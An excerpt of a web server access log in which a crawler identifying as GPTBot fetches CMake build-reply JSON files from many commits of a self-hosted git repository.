-[17/Feb/2026:19:49:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:19:49:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12794] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:49:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35754] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:49:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13622] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:49:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:49:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:19:49:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13749] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:49:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12794] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:49:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:49:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11162] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:49:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:49:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11147] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:49:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13623] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:49:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:19:49:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13623] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:49:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=source" [Client 74.7.227.38] [Length 12794] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:49:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35755] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:49:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11161] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:49:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=rendered" [Client 74.7.227.38] [Length 11151] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:49:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:19:49:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=source" [Client 74.7.227.38] [Length 19998] [Gzip 9.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:19:49:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13621] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:49:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=rendered" [Client 74.7.227.38] [Length 11136] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:19:49:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:49:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json?display=rendered" [Client 74.7.227.38] [Length 11163] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/codemodel-v2-9667b34a63c41f658bd0.json" -[17/Feb/2026:19:49:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13748] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:49:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=source" [Client 74.7.227.38] [Length 11602] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:19:49:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13749] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:49:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=source" [Client 74.7.227.38] [Length 13749] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:49:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=source" [Client 74.7.227.38] [Length 19999] [Gzip 9.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:19:49:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json?display=source" [Client 74.7.227.38] [Length 12870] [Gzip 4.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/toolchains-v1-d3c36b1ab110a30a9367.json" -[17/Feb/2026:19:49:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=source" [Client 74.7.227.38] [Length 11630] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:19:49:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35755] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:49:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35757] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:49:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:49:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json?display=source" [Client 74.7.227.38] [Length 35754] [Gzip 10.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/.cmake/api/v1/reply/cache-v2-efc1d9dcb0973c2cf0d3.json" -[17/Feb/2026:19:49:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json?display=source" [Client 74.7.227.38] [Length 19971] [Gzip 9.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/cmakeFiles-v1-c9ada5131af9e23965da.json" -[17/Feb/2026:19:49:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json?display=rendered" [Client 74.7.227.38] [Length 11120] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/codemodel-v2-baa04e54aa33eda3d2a6.json" -[17/Feb/2026:19:49:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/toolchains-v1-1ab1a58c6da679145e16.json" -[17/Feb/2026:19:49:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=rendered" [Client 74.7.227.38] [Length 11157] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json" -[17/Feb/2026:19:49:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json?display=source" [Client 74.7.227.38] [Length 13622] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/.cmake/api/v1/reply/target-TestApp-Debug-49a73e2df8eb541ea9c8.json" -[17/Feb/2026:19:49:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-cpp-28b735f6cb18e002ddf0.json?display=source" [Client 74.7.227.38] [Length 11632] [Gzip 3.34] 